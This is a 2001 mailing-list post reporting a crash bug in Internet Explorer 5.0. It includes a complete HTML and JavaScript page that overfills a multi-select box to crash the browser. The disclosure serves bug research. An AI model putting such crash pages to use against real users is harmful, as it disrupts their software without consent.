Vulnerability Development mailing list archives
I: IE 5.0 vulnerability
From: "Thomas Magnum" <dr_oo_py () hotmail com>
Date: Tue, 22 May 2001 17:44:20 +0200
I found out a vulnerability for IE 5.0, don't know if it was already discovered (if so, forget this). It seems that the problem is javascript. I don't know if it is exploitable, but if I try to open an html file like this: <script> function crashme() { var i, opt; for(i = 0; i < 7; i++) { opt = new Option('crashing...', i); document.vulnForm.p_select.options[i] = opt; document.vulnForm.p_select.options[i].selected = true; } } </script> <html> <head> <title>IE 5.0 Vulnerability</title> </head> <body> <form name="vulnForm"> <table width="100%" border="0"> <tr> <td align="center"> <select name="p_select" size="5" multiple> <option>__________________</option> </select> </td> </tr> <tr> <td align="center"> <input type="button" name="cmd" value="go!" onClick="crashme()"> </td> </tr> </table> </form> </body> </html> I get the classical Winxx error... I noticed that IE crashes when I try to put in the select at least 3 items more than its size.
Current thread:
- I: IE 5.0 vulnerability Thomas Magnum (May 22)